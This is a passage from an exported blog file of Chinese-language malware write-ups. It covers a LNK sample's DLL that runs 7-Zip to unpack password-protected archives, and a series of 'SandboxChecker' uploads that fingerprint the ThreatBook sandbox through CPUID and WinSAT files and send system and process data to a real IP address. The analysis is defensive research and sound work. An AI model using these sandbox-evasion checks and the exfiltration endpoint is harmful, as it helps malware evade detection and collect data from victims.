alt=\"image-20231031230617669\"></p>\n<p>Cab也找到了，剩下的可以直接解压Link1.cab查看文件了。</p>\n<p><img src=\"/./../img/image-20231031230741416.png\" alt=\"image-20231031230741416\"></p>\n<p>第一眼看到exe和俩dll时，我还开心的以为是白加黑，可惜情况并不如我所愿 <code>b1b86e6fd9.OIL</code>&#x2F;<code>d0437f784fad.LLL</code>&#x2F;<code>dd5c0d72bf.SIJ</code>为三个压缩包（有密码</p>\n<p>exe和z.dll是7zip。所以似乎可以把目光转向WEB.dll这个倒霉蛋了</p>\n<p><img src=\"/./../img/image-20231031231145649.png\" alt=\"image-20231031231145649\"></p>\n<h2 id=\"半成品分析的WEB-dll\"><a href=\"#半成品分析的WEB-dll\" class=\"headerlink\" title=\"半成品分析的WEB.dll\"></a>半成品分析的WEB.dll</h2><p>这里还得感谢DI，WEB.dll刚落地就给扬了</p>\n<p><img src=\"/./../img/image-20231031231341053.png\"></p>\n<p>大致思路也清晰了，开始转向WEB.dll。由于我逆向一直是半斤八两，索性直接看String里有什么了</p>\n<p><img src=\"/./../img/image-20231031231449318.png\"></p>\n<p>很好，很有精神。找到了个路径，看起来像是拼接行为。随后接着研究吧</p>\n<p><img src=\"/./../img/image-20231031232729711.png\"></p>\n<p>通过内容来看是从GKAMSMDV中读取XYL项，打开发现是个Vmware桥接的配置信息，但是里面多了自定义项XLY</p>\n<p><img src=\"/./../img/image-20231031231929836.png\"></p>\n<p>随后往下翻阅，可以看到又是在构造语句</p>\n<p><img src=\"/./../img/image-20231031232846022.png\"></p>\n<p>好了，可以确定构造内容了</p>\n<p>有部分路径没找到，所以又用到了。。。Process monitor查看</p>\n<figure class=\"highlight armasm\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs armasm\">例<br>C:\\Users\\Default\\Desktop\\(<span class=\"hljs-built_in\">P0</span>)LNKNEW\\(<span class=\"hljs-built_in\">P1</span>)<span class=\"hljs-number\">588388456</span>db280daIJE.exe x C:\\Users\\Default\\Desktop\\(<span class=\"hljs-built_in\">P0</span>)LNKNEW\\(<span class=\"hljs-built_in\">P2</span>)d0437f784fad.LLL -o(干，这个路径没找到哪来的 烦)C:\\Users\\RhineLab\\AppData\\ -p(<span class=\"hljs-built_in\">P3</span>)<span class=\"hljs-number\">0795</span>ea6f59475671GHB -aos<br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/./../img/image-20231031234351542.png\"></p>\n<p>文件提取完成</p>\n<p><img src=\"/./../img/image-20231031235325776.png\" alt=\"image-20231031235325776\"></p>\n<h2 id=\"流程图\"><a href=\"#流程图\" class=\"headerlink\" title=\"流程图\"></a>流程图</h2><p>好好好！分析到这里就差不多了，写个流程图吧。是在肝不动了。挖坑下次继续 </p>\n<blockquote>\n<p>样本留存 #7004665f20293bc4d74b39ddc922c6668d9df803.zip</p>\n</blockquote>\n<p><img src=\"/./../img/image-20231101030216781.png\" alt=\"image-20231101030216781\"></p>\n<p><img src=\"/./../img/image-20231101030517618.png\" alt=\"image-20231101030517618\"></p>\n<p><img src=\"/./../img/image-20231101013457720.png\" alt=\"image-20231101013457720\"></p>\n"},{"title":"TBSandbox-Day2","date":"2024-04-05T06:54:35.000Z","_content":"\n# 微步沙箱分析-Day2\n\n这篇文章的兴趣来源是某位大哥在疯狂的上传SandboxChecker,所以我来按时间分析一下他的实验成果.\n\n![](../img/TBSandbox-Day2/image-20240405151713354.png)\n\n## SandboxChecker V1.0\n\n![](../img/TBSandbox-Day2/image-20240405153807865.png)\n\n大概是最初的版本,只检测了CPU制造商和是否支持SSE\n\n![](../img/TBSandbox-Day2/image-20240405154224572.png)\n\n![](../img/TBSandbox-Day2/image-20240405154400833.png)\n\n## SandboxChecker V1.1\n\n![](../img/TBSandbox-Day2/image-20240405154432457.png)\n\n在经过40分钟后,又上传了新的SandboxChecker 我称之为V1.1 小版本号更新一下吧 虽然功能完全不一致\n\nV1.1版本则开始试图读取虚拟化信息了.\n\n![](../img/TBSandbox-Day2/image-20240405155035221.png)\n\n![](../img/TBSandbox-Day2/image-20240405155019955.png)\n\n但是这种检测方式还是比较容易绕过的Like:\n\n![](../img/TBSandbox-Day2/image-20240405160457432.png)\n\n所以相对来说针对沙箱是无效的,所以我们来看一看更新的版本\n\n## SandboxChecker V1.1.1\n\n![](../img/TBSandbox-Day2/image-20240405161340796.png)\n\n哦,好吧. 我准备将V1.2版本号更改成V1.1.1 因为这个跟V1.1基本没有什么区别 只是改了一点点输出\n\n![](../img/TBSandbox-Day2/image-20240405161442896.png)\n\n> 注:当 RAX 寄存器被设置为 0x40000000 时 CPUID 返回的信息是 \"VMXh\"（Virtual Machine eXtensions）这些信息用于检测 CPU 是否支持虚拟化技术。\n\n![](../img/TBSandbox-Day2/image-20240405161605646.png)\n\n附代码:\n\n```c++\n#include <iostream>\n#include <cstring>\n\nvoid cpuid(unsigned int op, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx) {\n    __asm__(\n            \"cpuid;\"\n            : \"=a\" (*eax), \"=b\" (*ebx), \"=c\" (*ecx), \"=d\" (*edx)\n            : \"a\" (op)\n            );\n}\n\nint main() {\n    unsigned int eax, ebx, ecx, edx;\n\n    // 查询扩展的 CPUID 信息\n    cpuid(0x40000000, &eax, &ebx, &ecx, &edx);\n\n    char signature[13] = {0};\n    memcpy(&signature[0], &ebx, 4);\n    memcpy(&signature[4], &ecx, 4);\n    memcpy(&signature[8], &edx, 4);\n\n    std::cout << \"VMXh: \" << signature << std::endl;\n\n    return 0;\n}\n\n```\n\n\n\n## SandboxChecker V1.2\n\n![](../img/TBSandbox-Day2/image-20240405161932160.png)\n\n在历时8个小时后 又开始了新的尝试.本次代码变动比较大(我挺想叫他V2.0的)\n\n![](../img/TBSandbox-Day2/image-20240405162501691.png)\n\n开始获取计算机名称,系统信息,磁盘信息.并且会遍历`C:\\Windows\\Performance\\WinSAT\\DataStore\\*`下所有文件 \n\n通过`CreateToolhelp32Snapshot`创建进程快照来遍历进程, 随后将获取到的信息发送至`117.50.179.15:8086`\n\n![](../img/TBSandbox-Day2/image-20240405163028493.png)\n\n抓包后内容:\n\n```\nsystemInfo=Computer Name: DESKTOP-H9URB7T, CPU Cores: 4, Hard Drives: 2\nDirectory Contents: \ndesktop.ini\nMicrosoft Edge.lnk\n\nWinSAT: \n2021-01-26 03.06.25.993.winsat.etl\n2021-01-26 03.06.26.712 Cpu.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Disk.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 DWM.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Graphics3D.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Mem.Assessment (Initial).WinSAT.xml\n2021-01-26 03.08.10.544 Formal.Assessment (Initial).WinSAT.xml\n\nProcess Name: [System Process], PID: 0\nProcess Name: System, PID: 4\nProcess Name: Registry, PID: 96\nProcess Name: smss.exe, PID: 324\nProcess Name: csrss.exe, PID: 440\nProcess Name: wininit.exe, PID: 516\nProcess Name: csrss.exe, PID: 524\nProcess Name: winlogon.exe, PID: 616\nProcess Name: services.exe, PID: 660\nProcess Name: lsass.exe, PID: 680\nProcess Name: svchost.exe, PID: 792\nProcess Name: svchost.exe, PID: 816\nProcess Name: fontdrvhost.exe, PID: 836\nProcess Name: fontdrvhost.exe, PID: 844\nProcess Name: svchost.exe, PID: 924\nProcess Name: svchost.exe, PID: 988\nProcess Name: dwm.exe, PID: 352\nProcess Name: svchost.exe, PID: 508\nProcess Name: svchost.exe, PID: 812\nProcess Name: svchost.exe, PID: 656\nProcess Name: svchost.exe, PID: 1088\nProcess Name: svchost.exe, PID: 1096\nProcess Name: svchost.exe, PID: 1160\nProcess Name: svchost.exe, PID: 1164\nProcess Name: svchost.exe, PID: 1184\nProcess Name: svchost.exe, PID: 1236\nProcess Name: svchost.exe, PID: 1296\nProcess Name: svchost.exe, PID: 1348\nProcess Name: svchost.exe, PID: 1380\nProcess Name: svchost.exe, PID: 1392\nProcess Name: svchost.exe, PID: 1416\nProcess Name: svchost.exe, PID: 1452\nProcess Name: svchost.exe, PID: 1516\nProcess Name: svchost.exe, PID: 1648\nProcess Name: svchost.exe, PID: 1696\nProcess Name: svchost.exe, PID: 1708\nProcess Name: svchost.exe, PID: 1720\nProcess Name: svchost.exe, PID: 1812\nProcess Name: svchost.exe, PID: 1824\nProcess Name: svchost.exe, PID: 1900\nProcess Name: svchost.exe, PID: 1932\nProcess Name: spoolsv.exe, PID: 1116\nProcess Name: audiodg.exe, PID: 720\nProcess Name: svchost.exe, PID: 1512\nProcess Name: svchost.exe, PID: 2052\nProcess Name: svchost.exe, PID: 2132\nProcess Name: svchost.exe, PID: 2180\nProcess Name: svchost.exe, PID: 2536\nProcess Name: svchost.exe, PID: 2544\nProcess Name: svchost.exe, PID: 2552\nProcess Name: svchost.exe, PID: 2560\nProcess Name: AcrylicService.exe, PID: 2568\nProcess Name: svchost.exe, PID: 2576\nProcess Name: svchost.exe, PID: 2584\nProcess Name: svchost.exe, PID: 2628\nProcess Name: svchost.exe, PID: 2804\nProcess Name: svchost.exe, PID: 3056\nProcess Name: svchost.exe, PID: 752\nProcess Name: sppsvc.exe, PID: 2508\nProcess Name: SppExtComObj.Exe, PID: 760\nProcess Name: svchost.exe, PID: 3084\nProcess Name: svchost.exe, PID: 3196\nProcess Name: svchost.exe, PID: 3328\nProcess Name: sihost.exe, PID: 3572\nProcess Name: svchost.exe, PID: 3596\nProcess Name: svchost.exe, PID: 3772\nProcess Name: ctfmon.exe, PID: 3860\nProcess Name: taskhostw.exe, PID: 3900\nProcess Name: explorer.exe, PID: 3188\nProcess Name: svchost.exe, PID: 3692\nProcess Name: svchost.exe, PID: 3724\nProcess Name: ChsIME.exe, PID: 3648\nProcess Name: svchost.exe, PID: 4212\nProcess Name: StartMenuExperienceHost.exe, PID: 4220\nProcess Name: svchost.exe, PID: 4256\nProcess Name: RuntimeBroker.exe, PID: 4416\nProcess Name: ApplicationFrameHost.exe, PID: 4716\nProcess Name: MicrosoftEdge.exe, PID: 4736\nProcess Name: browser_broker.exe, PID: 4844\nProcess Name: svchost.exe, PID: 4944\nProcess Name: dllhost.exe, PID: 5020\nProcess Name: Windows.WARP.JITService.exe, PID: 5028\nProcess Name: RuntimeBroker.exe, PID: 3804\nProcess Name: MicrosoftEdgeCP.exe, PID: 4352\nProcess Name: MicrosoftEdgeSH.exe, PID: 4496\nProcess Name: WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe, PID: 5284\nProcess Name: WeChat.exe, PID: 5544\nProcess Name: taskhostw.exe, PID: 5932\nProcess Name: svchost.exe, PID: 6068\nProcess Name: TrustedInstaller.exe, PID: 6132\nProcess Name: svchost.exe, PID: 3468\nProcess Name: usocoreworker.exe, PID: 5564\nProcess Name: TiWorker.exe, PID: 5732\nProcess Name: svchost.exe, PID: 5492\nProcess Name: svchost.exe, PID: 668\nProcess Name: WmiPrvSE.exe, PID: 4796\nProcess Name: WmiPrvSE.exe, PID: 3916\nProcess Name: svchost.exe, PID: 4952\nProcess Name: svchost.exe, PID: 6028\nProcess Name: WeChat.exe, PID: 6092\nProcess Name: PWTXIkBXCb.exe, PID: 2432\nProcess Name: unsecapp.exe, PID: 3608\nProcess Name: ShellExperienceHost.exe, PID: 2204\nProcess Name: svchost.exe, PID: 4004\nProcess Name: persfw.exe, PID: 3212\nProcess Name: svchost.exe, PID: 2636\nProcess Name: QQ.exe, PID: 3524\nProcess Name: SafeDogGuardCenter.exe, PID: 5984\nProcess Name: sihost.exe, PID: 1848\nProcess Name: backgroundTaskHost.exe, PID: 2824\nProcess Name: Detonate.exe, PID: 5812\nProcess Name: BgackgroundTransferHost.exe, PID: 5040\nProcess Name: RemindersServer.exe, PID: 3884\nProcess Name: vba32lder.exe, PID: 5612\nProcess Name: wrctrl.exe, PID: 1336\nProcess Name: safedog.exe, PID: 6032\nProcess Name: SafeDogSiteIIS.exe, PID: 5652\nProcess Name: SafeDogServerUI.exe, PID: 1948\nProcess Name: GoogleUpdate.exe, PID: 5856\nProcess Name: audiodg.exe, PID: 4312\nProcess Name: taskhostw.exe, PID: 2640\nProcess Name: WUDFHost.exe, PID: 1524\nProcess Name: SafeDogGuardCenter.exe, PID: 5188\nProcess Name: WmiPrvSE.exe, PID: 6064\nProcess Name: GoogleUpdateSetup.exe, PID: 6004\nProcess Name: SafeDogTray.exe, PID: 2652\nProcess Name: safedogupdatecenter.exe, PID: 4988\nProcess Name: svchost.exe, PID: 1924\nProcess Name: ShellExperienceHost.exe, PID: 672\nProcess Name: RuntimeBroker.exe, PID: 6184\nProcess Name: svchost.exe, PID: 6996\nProcess Name: SandboxCheck.exe, PID: 6352\nProcess Name: conhost.exe, PID: 6312\n\n```\n\n> 以下内容为奇思妙想内容\n\nWinSAT的信息似乎不会改变,是不是可以通过比对哈希来查看是否为微步虚拟机呢?\n\n![](../img/TBSandbox-Day2/image-20240405164335823.png)\n\n\n\n## SandboxChecker V1.2.1\n\n![](../img/TBSandbox-Day2/image-20240405170635549.png)\n\n间隔20分钟的程序,只是多了个打开计算器`ShellExecuteW(0i64, L\"open\", L\"calc.exe\", 0i64, 0i64, 1);`\n\n查询作者精神状态,,,,\n\n\n\n## SandboxChecker V1.3.0\n\n![](../img/TBSandbox-Day2/image-20240405164952900.png)\n\n在历时一天后,作者似乎发现了新的大陆.但是为什么要切换到VS2008啊 我不能理解(\n\n![](../img/TBSandbox-Day2/image-20240405165228725.png)\n\n对的 作者开始察觉`C:\\Windows\\Performance\\WinSAT\\DataStore\\`隐藏着秘密,所以专门写了一个测试文件去检查目标文件是否存在并且回传到`117.50.179.15:4448`\n\n## SandboxChecker V1.3.1\n\n![](../img/TBSandbox-Day2/image-20240405165755925.png)\n\n![](../img/TBSandbox-Day2/image-20240405165954211.png)\n\n变化不大,简单的水一下过去了.\n\n## SandboxChecker V1.3.2\n\n![](../img/TBSandbox-Day2/image-20240405171157630.png)\n\nVS版本切换到了2015 看起来还在Debug程序的上传功能?\n\n![](../img/TBSandbox-Day2/image-20240405171119743.png)\n\n回传变更成了`117.50.179.15:4447`\n\n## SandboxChecker V1.3.3\n\n![](../img/TBSandbox-Day2/image-20240405171333235.png)\n\n![](../img/TBSandbox-Day2/image-20240405171442329.png)\n\n回传变更成了`117.50.179.15:4446`\n\n## SandboxChecker V1.4.0\n\n![](../img/TBSandbox-Day2/image-20240405173701737.png)\n\n1.4.0版本开始进军全新版本了\n\n![](../img/TBSandbox-Day2/image-20240405174029664.png)\n\n开始搜寻是否存在`Formal.Assessment (Initial).WinS`的文件与此文件中是否包含 `American Megatrends Inc.`\n\n如果存在则弹窗提示American Megatrends Inc.如果没有则打开计算器.\n\n## SandboxChecker V1.5.0   4月7日追踪更新版\n\n![](../img/TBSandbox-Day2/image-20240407131236283.png)\n\n凌晨两点,这小哥真的不睡觉的吗 功能变化不大,似乎与V1.2.0版本差不多,除了新增一个打开计算器\n\n![](../img/TBSandbox-Day2/image-20240407131407965.png)\n\n信息发送至`117.50.179.15:8086`\n\n```\nsystemInfo=Computer Name: DESKTOP-H9URB7T, CPU Cores: 4, Hard Drives: 2\nDirectory Contents: \ndesktop.ini\nMicrosoft Edge.lnk\n\nWinSAT: \n2021-01-26 03.06.25.993.winsat.etl\n2021-01-26 03.06.26.712 Cpu.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Disk.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 DWM.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Graphics3D.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Mem.Assessment (Initial).WinSAT.xml\n2021-01-26 03.08.10.544 Formal.Assessment (Initial).WinSAT.xml\n\n网卡信息:\nRealtek RTL8139C+ Fast Ethernet NIC\n\n开启窗口数量:\n6\nProcess Name: [System Process], PID: 0\nProcess Name: System, PID: 4\nProcess Name: Registry, PID: 96\nProcess Name: smss.exe, PID: 324\nProcess Name: csrss.exe, PID: 444\nProcess Name: wininit.exe, PID: 520\nProcess Name: csrss.exe, PID: 568\nProcess Name: winlogon.exe, PID: 620\nProcess Name: services.exe, PID: 660\nProcess Name: lsass.exe, PID: 684\nProcess Name: svchost.exe, PID: 796\nProcess Name: svchost.exe, PID: 820\nProcess Name: fontdrvhost.exe, PID: 840\nProcess Name: fontdrvhost.exe, PID: 848\nProcess Name: svchost.exe, PID: 940\nProcess Name: svchost.exe, PID: 992\nProcess Name: dwm.exe, PID: 348\nProcess Name: svchost.exe, PID: 360\nProcess Name: svchost.exe, PID: 696\nProcess Name: svchost.exe, PID: 1060\nProcess Name: svchost.exe, PID: 1072\nProcess Name: svchost.exe, PID: 1108\nProcess Name: svchost.exe, PID: 1184\nProcess Name: svchost.exe, PID: 1232\nProcess Name: svchost.exe, PID: 1272\nProcess Name: svchost.exe, PID: 1280\nProcess Name: svchost.exe, PID: 1312\nProcess Name: svchost.exe, PID: 1320\nProcess Name: svchost.exe, PID: 1412\nProcess Name: svchost.exe, PID: 1440\nProcess Name: svchost.exe, PID: 1464\nProcess Name: svchost.exe, PID: 1500\nProcess Name: svchost.exe, PID: 1536\nProcess Name: svchost.exe, PID: 1564\nProcess Name: svchost.exe, PID: 1656\nProcess Name: svchost.exe, PID: 1756\nProcess Name: svchost.exe, PID: 1824\nProcess Name: svchost.exe, PID: 1840\nProcess Name: audiodg.exe, PID: 1980\nProcess Name: svchost.exe, PID: 1992\nProcess Name: svchost.exe, PID: 2044\nProcess Name: svchost.exe, PID: 1192\nProcess Name: svchost.exe, PID: 1432\nProcess Name: spoolsv.exe, PID: 2148\nProcess Name: svchost.exe, PID: 2244\nProcess Name: svchost.exe, PID: 2276\nProcess Name: svchost.exe, PID: 2476\nProcess Name: svchost.exe, PID: 2484\nProcess Name: svchost.exe, PID: 2492\nProcess Name: AcrylicService.exe, PID: 2500\nProcess Name: svchost.exe, PID: 2536\nProcess Name: svchost.exe, PID: 2564\nProcess Name: svchost.exe, PID: 2580\nProcess Name: svchost.exe, PID: 2592\nProcess Name: svchost.exe, PID: 2752\nProcess Name: svchost.exe, PID: 3020\nProcess Name: svchost.exe, PID: 2412\nProcess Name: svchost.exe, PID: 352\nProcess Name: svchost.exe, PID: 3084\nProcess Name: sihost.exe, PID: 3324\nProcess Name: svchost.exe, PID: 3352\nProcess Name: svchost.exe, PID: 3488\nProcess Name: ctfmon.exe, PID: 3520\nProcess Name: taskhostw.exe, PID: 3576\nProcess Name: explorer.exe, PID: 3792\nProcess Name: sppsvc.exe, PID: 3916\nProcess Name: svchost.exe, PID: 3984\nProcess Name: svchost.exe, PID: 4060\nProcess Name: ChsIME.exe, PID: 4080\nProcess Name: SppExtComObj.Exe, PID: 3956\nProcess Name: StartMenuExperienceHost.exe, PID: 4120\nProcess Name: svchost.exe, PID: 4128\nProcess Name: svchost.exe, PID: 4160\nProcess Name: svchost.exe, PID: 4248\nProcess Name: RuntimeBroker.exe, PID: 4368\nProcess Name: ApplicationFrameHost.exe, PID: 4672\nProcess Name: MicrosoftEdge.exe, PID: 4692\nProcess Name: browser_broker.exe, PID: 4816\nProcess Name: svchost.exe, PID: 4892\nProcess Name: dllhost.exe, PID: 4972\nProcess Name: Windows.WARP.JITService.exe, PID: 4984\nProcess Name: RuntimeBroker.exe, PID: 5088\nProcess Name: MicrosoftEdgeSH.exe, PID: 4428\nProcess Name: MicrosoftEdgeCP.exe, PID: 4460\nProcess Name: WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe, PID: 5264\nProcess Name: WeChat.exe, PID: 5536\nProcess Name: taskhostw.exe, PID: 5960\nProcess Name: svchost.exe, PID: 6120\nProcess Name: svchost.exe, PID: 4916\nProcess Name: TrustedInstaller.exe, PID: 5644\nProcess Name: TiWorker.exe, PID: 5500\nProcess Name: svchost.exe, PID: 2600\nProcess Name: WmiPrvSE.exe, PID: 4744\nProcess Name: WmiPrvSE.exe, PID: 6076\nProcess Name: WeChat.exe, PID: 5992\nProcess Name: svchost.exe, PID: 3940\nProcess Name: svchost.exe, PID: 5592\nProcess Name: MjUVfuNpXl.exe, PID: 1348\nProcess Name: unsecapp.exe, PID: 2896\nProcess Name: Detonate.exe, PID: 1372\nProcess Name: svchost.exe, PID: 1260\nProcess Name: GoogleUpdateSetup.exe, PID: 5244\nProcess Name: clamd.exe, PID: 1612\nProcess Name: svchost.exe, PID: 1684\nProcess Name: taskhostw.exe, PID: 2552\nProcess Name: RemindersServer.exe, PID: 2432\nProcess Name: backgroundTaskHost.exe, PID: 1936\nProcess Name: UniversalAVService.exe, PID: 4196\nProcess Name: audiodg.exe, PID: 1424\nProcess Name: EverythingServer.exe, PID: 4336\nProcess Name: WUDFHost.exe, PID: 4840\nProcess Name: GoogleUpdate.exe, PID: 5892\nProcess Name: WeChat.exe, PID: 3236\nProcess Name: sihost.exe, PID: 5200\nProcess Name: WmiPrvSE.exe, PID: 5192\nProcess Name: QQ.exe, PID: 2720\nProcess Name: ShellExperienceHost.exe, PID: 3244\nProcess Name: BackgroundTransferHost.exe, PID: 5520\nProcess Name: svchost.exe, PID: 5104\nProcess Name: ShellExperienceHost.exe, PID: 2548\nProcess Name: RuntimeBroker.exe, PID: 4240\nProcess Name: svchost.exe, PID: 5928\nProcess Name: SandboxCheck.exe, PID: 448\nProcess Name: conhost.exe, PID: 2272\nProcess Name: svchost.exe, PID: 4348\nProcess Name: calc.exe, PID: 464\n\n```\n\n\n\n\n\n## END\n\n就此似乎结束了 他没有更新新的东西\n\n他似乎发现了绕过微步的小技巧,但是总感觉这个技巧有点灵车)\n","source":"_posts/TBSandbox-Day2.md","raw":"---\ntitle: TBSandbox-Day2\ndate: 2024-04-05 14:54:35\ntags: 沙箱分析\n---\n\n# 微步沙箱分析-Day2\n\n这篇文章的兴趣来源是某位大哥在疯狂的上传SandboxChecker,所以我来按时间分析一下他的实验成果.\n\n![](../img/TBSandbox-Day2/image-20240405151713354.png)\n\n## SandboxChecker V1.0\n\n![](../img/TBSandbox-Day2/image-20240405153807865.png)\n\n大概是最初的版本,只检测了CPU制造商和是否支持SSE\n\n![](../img/TBSandbox-Day2/image-20240405154224572.png)\n\n![](../img/TBSandbox-Day2/image-20240405154400833.png)\n\n## SandboxChecker V1.1\n\n![](../img/TBSandbox-Day2/image-20240405154432457.png)\n\n在经过40分钟后,又上传了新的SandboxChecker 我称之为V1.1 小版本号更新一下吧 虽然功能完全不一致\n\nV1.1版本则开始试图读取虚拟化信息了.\n\n![](../img/TBSandbox-Day2/image-20240405155035221.png)\n\n![](../img/TBSandbox-Day2/image-20240405155019955.png)\n\n但是这种检测方式还是比较容易绕过的Like:\n\n![](../img/TBSandbox-Day2/image-20240405160457432.png)\n\n所以相对来说针对沙箱是无效的,所以我们来看一看更新的版本\n\n## SandboxChecker V1.1.1\n\n![](../img/TBSandbox-Day2/image-20240405161340796.png)\n\n哦,好吧. 我准备将V1.2版本号更改成V1.1.1 因为这个跟V1.1基本没有什么区别 只是改了一点点输出\n\n![](../img/TBSandbox-Day2/image-20240405161442896.png)\n\n> 注:当 RAX 寄存器被设置为 0x40000000 时 CPUID 返回的信息是 \"VMXh\"（Virtual Machine eXtensions）这些信息用于检测 CPU 是否支持虚拟化技术。\n\n![](../img/TBSandbox-Day2/image-20240405161605646.png)\n\n附代码:\n\n```c++\n#include <iostream>\n#include <cstring>\n\nvoid cpuid(unsigned int op, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx) {\n    __asm__(\n            \"cpuid;\"\n            : \"=a\" (*eax), \"=b\" (*ebx), \"=c\" (*ecx), \"=d\" (*edx)\n            : \"a\" (op)\n            );\n}\n\nint main() {\n    unsigned int eax, ebx, ecx, edx;\n\n    // 查询扩展的 CPUID 信息\n    cpuid(0x40000000, &eax, &ebx, &ecx, &edx);\n\n    char signature[13] = {0};\n    memcpy(&signature[0], &ebx, 4);\n    memcpy(&signature[4], &ecx, 4);\n    memcpy(&signature[8], &edx, 4);\n\n    std::cout << \"VMXh: \" << signature << std::endl;\n\n    return 0;\n}\n\n```\n\n\n\n## SandboxChecker V1.2\n\n![](../img/TBSandbox-Day2/image-20240405161932160.png)\n\n在历时8个小时后 又开始了新的尝试.本次代码变动比较大(我挺想叫他V2.0的)\n\n![](../img/TBSandbox-Day2/image-20240405162501691.png)\n\n开始获取计算机名称,系统信息,磁盘信息.并且会遍历`C:\\Windows\\Performance\\WinSAT\\DataStore\\*`下所有文件 \n\n通过`CreateToolhelp32Snapshot`创建进程快照来遍历进程, 随后将获取到的信息发送至`117.50.179.15:8086`\n\n![](../img/TBSandbox-Day2/image-20240405163028493.png)\n\n抓包后内容:\n\n```\nsystemInfo=Computer Name: DESKTOP-H9URB7T, CPU Cores: 4, Hard Drives: 2\nDirectory Contents: \ndesktop.ini\nMicrosoft Edge.lnk\n\nWinSAT: \n2021-01-26 03.06.25.993.winsat.etl\n2021-01-26 03.06.26.712 Cpu.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Disk.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 DWM.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Graphics3D.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Mem.Assessment (Initial).WinSAT.xml\n2021-01-26 03.08.10.544 Formal.Assessment (Initial).WinSAT.xml\n\nProcess Name: [System Process], PID: 0\nProcess Name: System, PID: 4\nProcess Name: Registry, PID: 96\nProcess Name: smss.exe, PID: 324\nProcess Name: csrss.exe, PID: 440\nProcess Name: wininit.exe, PID: 516\nProcess Name: csrss.exe, PID: 524\nProcess Name: winlogon.exe, PID: 616\nProcess Name: services.exe, PID: 660\nProcess Name: lsass.exe, PID: 680\nProcess Name: svchost.exe, PID: 792\nProcess Name: svchost.exe, PID: 816\nProcess Name: fontdrvhost.exe, PID: 836\nProcess Name: fontdrvhost.exe, PID: 844\nProcess Name: svchost.exe, PID: 924\nProcess Name: svchost.exe, PID: 988\nProcess Name: dwm.exe, PID: 352\nProcess Name: svchost.exe, PID: 508\nProcess Name: svchost.exe, PID: 812\nProcess Name: svchost.exe, PID: 656\nProcess Name: svchost.exe, PID: 1088\nProcess Name: svchost.exe, PID: 1096\nProcess Name: svchost.exe, PID: 1160\nProcess Name: svchost.exe, PID: 1164\nProcess Name: svchost.exe, PID: 1184\nProcess Name: svchost.exe, PID: 1236\nProcess Name: svchost.exe, PID: 1296\nProcess Name: svchost.exe, PID: 1348\nProcess Name: svchost.exe, PID: 1380\nProcess Name: svchost.exe, PID: 1392\nProcess Name: svchost.exe, PID: 1416\nProcess Name: svchost.exe, PID: 1452\nProcess Name: svchost.exe, PID: 1516\nProcess Name: svchost.exe, PID: 1648\nProcess Name: svchost.exe, PID: 1696\nProcess Name: svchost.exe, PID: 1708\nProcess Name: svchost.exe, PID: 1720\nProcess Name: svchost.exe, PID: 1812\nProcess Name: svchost.exe, PID: 1824\nProcess Name: svchost.exe, PID: 1900\nProcess Name: svchost.exe, PID: 1932\nProcess Name: spoolsv.exe, PID: 1116\nProcess Name: audiodg.exe, PID: 720\nProcess Name: svchost.exe, PID: 1512\nProcess Name: svchost.exe, PID: 2052\nProcess Name: svchost.exe, PID: 2132\nProcess Name: svchost.exe, PID: 2180\nProcess Name: svchost.exe, PID: 2536\nProcess Name: svchost.exe, PID: 2544\nProcess Name: svchost.exe, PID: 2552\nProcess Name: svchost.exe, PID: 2560\nProcess Name: AcrylicService.exe, PID: 2568\nProcess Name: svchost.exe, PID: 2576\nProcess Name: svchost.exe, PID: 2584\nProcess Name: svchost.exe, PID: 2628\nProcess Name: svchost.exe, PID: 2804\nProcess Name: svchost.exe, PID: 3056\nProcess Name: svchost.exe, PID: 752\nProcess Name: sppsvc.exe, PID: 2508\nProcess Name: SppExtComObj.Exe, PID: 760\nProcess Name: svchost.exe, PID: 3084\nProcess Name: svchost.exe, PID: 3196\nProcess Name: svchost.exe, PID: 3328\nProcess Name: sihost.exe, PID: 3572\nProcess Name: svchost.exe, PID: 3596\nProcess Name: svchost.exe, PID: 3772\nProcess Name: ctfmon.exe, PID: 3860\nProcess Name: taskhostw.exe, PID: 3900\nProcess Name: explorer.exe, PID: 3188\nProcess Name: svchost.exe, PID: 3692\nProcess Name: svchost.exe, PID: 3724\nProcess Name: ChsIME.exe, PID: 3648\nProcess Name: svchost.exe, PID: 4212\nProcess Name: StartMenuExperienceHost.exe, PID: 4220\nProcess Name: svchost.exe, PID: 4256\nProcess Name: RuntimeBroker.exe, PID: 4416\nProcess Name: ApplicationFrameHost.exe, PID: 4716\nProcess Name: MicrosoftEdge.exe, PID: 4736\nProcess Name: browser_broker.exe, PID: 4844\nProcess Name: svchost.exe, PID: 4944\nProcess Name: dllhost.exe, PID: 5020\nProcess Name: Windows.WARP.JITService.exe, PID: 5028\nProcess Name: RuntimeBroker.exe, PID: 3804\nProcess Name: MicrosoftEdgeCP.exe, PID: 4352\nProcess Name: MicrosoftEdgeSH.exe, PID: 4496\nProcess Name: WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe, PID: 5284\nProcess Name: WeChat.exe, PID: 5544\nProcess Name: taskhostw.exe, PID: 5932\nProcess Name: svchost.exe, PID: 6068\nProcess Name: TrustedInstaller.exe, PID: 6132\nProcess Name: svchost.exe, PID: 3468\nProcess Name: usocoreworker.exe, PID: 5564\nProcess Name: TiWorker.exe, PID: 5732\nProcess Name: svchost.exe, PID: 5492\nProcess Name: svchost.exe, PID: 668\nProcess Name: WmiPrvSE.exe, PID: 4796\nProcess Name: WmiPrvSE.exe, 